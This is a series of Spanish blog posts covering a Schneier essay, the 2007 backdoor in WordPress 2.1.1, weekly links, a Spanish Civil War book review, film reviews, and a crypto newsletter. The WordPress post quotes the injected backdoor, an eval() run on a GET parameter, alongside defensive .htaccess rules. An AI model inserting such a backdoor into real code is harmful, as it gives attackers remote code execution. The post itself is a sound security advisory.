In the past, I’ve criticized palliative security measures that only make people feel more secure as “security theater.” But used correctly, they can be a way of raising our feeling of security to more closely match the reality of security. One example is the tamper-proof packaging that started to appear on over-the-counter drugs in the 1980s, after a few highly publicized random poisonings. As a countermeasure, it didn’t make much sense. It’s easy to poison many foods and over-the-counter medicines right through the seal–with a syringe, for example–or to open and reseal the package well enough that an unwary consumer won’t detect it. But the tamper-resistant packaging brought people’s perceptions of the risk more in line with the actual risk: minimal. And for that reason the change was worth it.

The Psychology of Security, un interesante ensayo de Bruce Schneier.

ACTUALIZACIÓN: Traducido al castellano en seguridad digital.

Si has descargado e instalado la versión 2.1.1 de wordpress durante la última semana que sepas que tienes un pequeño problema que resolver. Algo así es lo que dicen en su blog oficial. Por lo visto un cracker ha tenido acceso al código de esta versión durante los últimos días y ha introducido en el mismo unas líneas que permiten la ejecución arbitraria de código de forma remota, concretamente en los ficheros feed.php y theme.php.

Para los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

La solución pasa por dar la mayor difusión a la noticia (para los despistados que no lean las notas que wordpress publica en su tablero inicial), actualizar lo antes posible a la nueva versión 2.1.2 que corrige este y, “poyaque” estamos, otros problemas o si no te es posible esto último usar la solución alternativa que sugieren en el blog de dreamhost e introducir las siguientes reglas de bloqueo en el fichero .htaccess de tu apache:

< Files theme.php >
order allow,deny
deny from all
< /Files >

< Files feed.php >
order allow,deny
deny from all
< /Files >

La semana no ha dado para mucho, la verdad. Al menos para mi. Pero para no perder la costumbre hay van las cosas más interesantes que he marcado en mis favoritos durante estos últimos siete días:

• Show us the code :\> Iniciativa que parte de una carta abierta a Steve Ballmer. ¿Que Linux viola la propiedad intelectual de Microsoft? No pasa nada: que digan dónde y se cambia…

• ¿Preinstalará Dell Linux en sus equipos o no? A principio de semana era que si. Luego parece que la cosa quedó en que no… ¡Pero que estrés!
• Ya hay un keygen para el código de activación de windows Vista. O eso es lo que dicen… Yo, la verdad, no tengo mucho interés por el momento pero a quien le interese aquí tiene el hilo del foro dónde se encuentra el presunto generador de claves (para acceder al foro es preciso registro previo). Pues no, parece que todo era una broma..
• 20 minutos suprime los anuncios de prostitución. Y, por el momento, parece ser el único periódico que prescindirá de este suculento biberón. Ni el ABC, ni La Razón (por decir dos de los más cercanos a “Dios Nuestro Señor”, vamos) ni ningún otro. En fin…
• Un gusano en Solaris Sin consecuencias, pero ahí está. Detalles aquí.
• HotSpots Wifi. Hotspotr es un proyecto basado en Google Maps para marcar los puntos de acceso wifi gratuitos o de pago. Por el momento no parece tener mucho éxito en Europa (y menos en nuestro país), pero habrá que seguirlo a ver que tal.
• ¿Otro pseudo-Digg más?. O tal vez no sea sólo eso… coRank tiene características que lo hacen algo distinto a los demás. Lo explican muy bien en Error500. Ricardo Galli, autor de Menéame, también opina sobre este nuevo servicio.

Ninguna política se ha de fundar en la decisión de exterminar al adversario; no sólo –y ya es mucho– porque moralmente es una abominación sino porqué, además, es materialmente irrealizable; y la sangre injustamente vertida por el odio, con propósito de exterminio, renace y retoña y fructifica en frutos de maldición; maldición no sobre los que la derramaron, desgraciadamente, sino sobre el propio país que la ha absorbido para colmo de desventura.

Con esta cita de Manuel Azaña concluye “Una historia de la guerra civil que no va a gustar a nadie“, un libro de Juan Eslava Galán que habla sobre la guerra civil española centrándose fundamentalmente en anécdotas y sucedidos personales de uno y otro bando, tanto de personajes anónimos como de los protagonistas más conocidos de la contienda. El libro, que promete ser imparcial en su prólogo, pasa muy de puntillas por los fusilamientos de Paracuellos y elude demasiado fácilmente las posibles responsabilidades de Santiago Carrillo en este hecho lo cual, al menos a mi, me deja claro que no lo es. Tampoco creo que se pueda ser del todo imparcial en una narración como esta. Pero lo que si consigue bastante bien a través de una enorme compilación de anécdotas es restar protagonismo a las causas políticas y económicas del conflicto y devolvérselo a la gente que trágicamente luchó y perdió la vida en uno u otro bando.

Algunas historias sobrecogen por su frialdad y muestran el escaso valor que tuvo la vida humana durante aquellos años. Y como ejemplo esta narración de José Luis de Villalonga extraida de su libro Memorias no Autorizadas:

A mi padre se le cayó al suelo, al abrir su maletín, un cuaderno que se quedó abierto en una página en la que había una larga lista de nombres extranjeros. Mi madre recogió el cuaderno y se puso a leer en voz alta: “Adam Lipkowsky, polaco, profesor de biología. Dos daneses sin nombre a todas luces homosexuales. Cuatro norteamericanos directores de empresa. Hasso von Zarkenau, un alemán antinazi con carnet de miembro del Partido Comunista checoslovaco. Siete rusos sin nombre. Ocho franceses, entre ellos tres profesores de universidad y cinco estudiantes de ciencias políticas. Sir Alan Seaford, un inglés sin más documentación que sus tarjetas de visita. Guido Ferrara, un terrateniente de Calabria…”. Mi madre dejó de leer.
–̶ Salvador, ¿quién es esta gente?
–̶ Miembros de las Brigadas Internacionales cogidos con las armas en la mano. Los he mandado fusilar personalmente, sin previo juicio ni zarandajas. Uno por cada par de zapatos que los rojos me robaron en Barcelona.
Y como mi madre no decía nada, añadió:
–̶ De todas maneras los íbamos a fusilar. Lo mismo que hacen ellos cuando cogen a los alemanes o a los italianos que luchan en nuestras filas.
Mi madre sentada ante su tocador se estaba peinando
–̶ Ese inglés, Alan Seafored, me dice algo –murmuró.
–̶ Es un pariente de los duques de Portland, un sobrino, un primo o algo así.
–̶ ¿Cómo lo sabes?
–̶ Me lo dijo él mismo. Le invité a tomar una copa de coñac antes de darle mi pistola para que se pegase un tiro. Y, claro, estuvimos hablando un rato.
–̶ ¿Se suicidó con tu pistola?
–̶ Si. Al fin y al cabo era un señor. No iba a dejar que se lo cargasen como si fuesra uno de esos cerdos que salen de Dios sabe dónde.
Mi madre acabó de peinarse y le pidió a mi padre que le asegurase el cierre de su collar de perlas.
–̶ Esos ingleses –comentó, molesta– siempre se meten donde nadie les llama.
Mi padre se ajustó el correaje del uniforme y dijo con esa rígida media sonrisa que le permitía el monóculo:
–̶ Lo que nunca sabrán los de Portland es que el primo Seaford ha muerto por un par de zapatos.

Pero no todas las anécdotas del libro son tan crudas. Hay otras bastante más ligeras, como esta del primer sermón de un párroco catalán que tras permanecer tres años escondido en una masía retoma su ministerio una vez que los fascistas han tomado la zona:

Querídisimos hermanos (comienza el sermón con fuerte acento catalán), ved a dónde nos ha conducido vuestra mala cabeza: tantos vecinos muertos en el frente o asesinados; los campos sin arar; los animales muertos o robados; la iglesia destrozada y yo… ¡yo hablando en castellano!

En uno de los anexos del libro figura una relación muy interesante, al estilo de estas películas “basadas en hechos reales”, que cuenta lo que ocurrió una vez terminada la guerra con algunos de los protagonistas citados. En otro aparece una tabla con una estimación desglosada de las pérdidas humanas debidas directamente al conflicto:

• Entre 100.000 y 125.000 muertes en el campo de batalla.

• 10.000 muertes por bombardeos aereos
• 50.000 muertes por enfermedad y hambre.
• 20.000 muertes por represalias políticas en la zona republicana
• entre 150.000 y 200.000 muertes por represalias en la zona nacional entre 1936 y 1944

El hecho de que los asesinatos por represalias políticas por parte de los fascistas (“nacionales”, según ellos) casi duplican a los muertos durante la contienda pone de relieve la dureza de la represión que se sufrió en nuestro país durante la postguerra.

Ampliaciones y otras referencias en la wikipedia.

• Little Miss Sunshine. 2006. La comedia es uno de los géneros que menos me interesa y no suelo ver muchas. Menos en pantalla grande. Pero a veces me alegro de hacer excepciones y creo que esta pequeña Miss Sunshine es una verdadera maravilla que no hay que perderse. ¡Parece mentira el partido que le sacan los estadounidenses a esto de los !road-movies!! Los personajes son todos maravillosos y los actores están enormes. Deberían de haberles dado el oscar a todos y no sólo a “grandpa”. Por cierto, Toni Collete (Sheryl en la peli) es Muriel. ¡Qué buena peli esa también! Confieso que aunque me sonaba mucho su cara no me acordé hasta que consulté la ficha de IMDB (¡bendita web!) en casa.
  Y me quedo con una frase de la película: “La vida es como un jodido concurso de belleza detrás de otro. El colegio, la universidad, el trabajo…”. Ala señores, a la pasarela a seguir compitiendo…

• Frágiles. 2005. No se me ocurre decir más que una cosa: ¡Pero que mala que es, joder!
• La pesadilla de Darwin. 2004. Estremecedora película documental que, una vez más, nos golpea echándonos en cara lo mucho que depende nuestro nivel de vida de las miserias del tercer mundo.
• Cleopatra. 2003. Los argentinos también saben hacer buenas “road movies”. Quizás algo sensiblera en algunos momentos pero, en general, bastante entretenida.
• El lado oscuro del corazón. 1992. Me encanta esta película. La recordé a partir de un post en el blog de antonio zugaldia y no he parado hasta encontrarla para volver a verla. Qué dificil ir hilando los diálogos y las situaciones con los poemas. Y que bien retratado el personaje de Oliverio, su relación con la prostituta, su visión de la vida y sus diálogos con la muerte. Un peliculón. Por cierto, buscando referencias sobre ella he visto que hay una segunda parte en la que Oliverio viaja a España en busca de su amada. La valoración que dan de ella en IMDB no da muchas esperanzas, pero ¿alguien por aquí la ha visto?
• El último rey de Escocia. 2006. A Moeh parece demasiado floja (si quieres leer su opinión sobre la peli y, ya de paso, un buen apunte sobre la vida de Idi Amin y las barbaridades de su régimen échale un vistazo a su entrada). Yo creo que en ningún momento han pretendido retratar los excesos del gobierno de esta alimaña sino más bien hacer un retrato psicológico de este psicópata megalómano a través de los ojos (inventados) de un joven e inexperto médico escocés y tratar de que así comprendamos en parte la mezcla de fascinación y horror que suelen despertar a su alrededor estos indeseables. Y, ya de paso, diseñar un papel a medida para el lucimiento personal de Forest Withaker que, verdaderamente, está que se sale. Y una advertencia: ni se os ocurra ir a ver la peli si no es en versión original porque mucho me temo que, como siempre, habrán escogido un acento caribeño o, peor aún, andaluz para doblar al dictador. ¿Me puede decir alguien si es así?
• El diablo viste de Prada. 2006. Previsible desde el primer fotograma hasta el último pero vale para entretener una tarde lluviosa de domingo de estas en las que no tienes ninguna otra cosa que hacer. Si, además, te gustan los modelitos y el mundo de la moda (no es mi caso) entoces tienes un aliciente más. Pero nada más.

Enigma, boletín digital del Taller de Criptografía de Arturo Quirantes Sierra, cumple 50 números con su última edición de hoy 1 de marzo. Si te gusta este mundillo seguro que ya lo tienes como referencia y no estoy diciéndote nada nuevo pero, si no es así, échale un vistazo que seguro que te encanta.

El índice de este número tan especial es el siguiente:

• EDITORIAL.

• TEMAS DE ACTUALIDAD: Algo más sobre las funciones hash.
• CRIPTOGRAFÍA IMPRESENTABLE: Pirateando a Nemo, tercera parte.
• CRIPTOGRAFÍA HISTÓRICA: Los orígenes de la máquina de rotores.
• LIBERTAD VIGILADA: El “caso Pollard” y los espías de Rota.

En este mundillo ahora tan colaborativo y tan “2.0″ recibir un boletín por correo a la antigua usanza en formato de texto plano y con cabeceras hechas con caracteres ASCII se convierte, además, en un sano ejercicio de nostalgia que te retrotrae a otros tiempos. Pero si eres un incondicional de estos nuevos tiempos que corren Arturo Quirantes también tiene un blog. ¡Faltaría más!